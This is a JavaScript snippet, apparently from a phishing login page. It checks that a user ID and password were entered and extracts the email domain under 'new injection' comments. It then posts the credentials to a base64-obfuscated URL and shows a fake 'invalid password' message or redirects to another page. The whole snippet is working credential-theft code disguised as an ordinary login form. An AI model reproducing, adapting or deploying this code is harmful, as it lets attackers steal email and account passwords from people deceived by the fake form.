    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#error').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();

        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#errorrr').html("User ID field is empty.!");
            return false;
        }

        if (!pr) {
            $('#error').show();
            $('#errorrr').html("Password field is empty.!");
            return false;
        }

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        ///////////new injection////////////////
        count = count + 1;

        $.ajax({
            dataType: 'JSON',
            url: atob(file),
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifying...');
            },
            
            complete: function() {
                if (count >= 1) {
                    count = 0;

                    window.location.replace("./em.html");

                    return false;

                }
                $("#errorrr").html("You have entered an invalid User ID and/or Passcode. Please try again.");
                $("#error").show();
                $("#pr").val("");
                $('#submit-btn').html('Log In');
            }
        });
    });